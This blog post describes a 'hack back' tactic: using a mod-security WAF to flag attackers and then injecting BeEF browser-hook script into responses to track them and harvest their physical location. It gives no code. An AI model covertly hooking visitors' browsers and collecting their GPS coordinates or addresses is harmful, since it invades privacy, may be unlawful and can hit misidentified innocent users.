Normally, most organizations when responding to web-borne application attacks against their websites, take the approach of responding to the malicious attack traffic itself such as responding to cross-site scripting (XSS or CSRF) with a combination of output encoding/escaping combined with some form of input validation for untrusted user input.They may also add additional protection measures such as utilizing some form of content-security policy (CSP) or active content signatures (ACS) to further protect users of their applications from malicious scripts, iframes (click-jacking) etc.. These are of course very good steps to take and can indeed be very effective if implemented properly. But, in this post, I'd like to briefly discuss a slightly different approach to dealing with malicious attackers that are attacking your websites, and how this approach can significantly assist in identifying attackers, and in incident response actions.. Leveraging a tool set called BeEF ( Browser Exploitation Framework) in conjunction with a Web Application Firewall (WAF) such as Mod-security, you can utilize the BeEF application to hook malicious client browsers (not automated tools) that are attacking your websites , and provide much better information for incident response investigations. It allows you to take the fight back to the malicious attackers of your websites.What exactly is BeEF?, As mentioned above, BeEF stands for Browser Exploitation Framework, and it a penetration testing tool set (http://beefproject.com/), designed to test the exploitability of your web browser environment and trust me when i say it does a great job of that!
I wont discuss BeEF's full attack capabilities here (you can check it out for yourself ) but its a very powerful tool to say the least. Instead of taking advantage of XSS vulnerabilities in your application as a pen testing attack vector, you can leverage a WAF like mod-security to not only identify malicious clients of your application, but you can subsequently modify the HTTP response header sent back to malicious client requests and directly hook them utilizing the BeEF javascript hook code.. This will allow you to keep close tabs on the attackers of your website, and allow you to monitor their every move and activities. This is a much more effective tactic than trying to respond to incidents when all you have is an IP address (which I'm sure is not the real IP address due to the fact that the attacker is tunneling their traffic through proxies or other intermediary systems). BeEF contains some powerful data harvesting capabilities and can harvest critical details from the attackers web browser such as the "True Geographic location" of the attacker, some of the location enumeration modules (under the host folder) can be used to get physical location including GPS coordinates and street address details. You can even open up a dialog prompt and communicate with the hooked browser and ask questions about why your sight is being pwned.. Pretty cool....
MH - "Madame Hack"
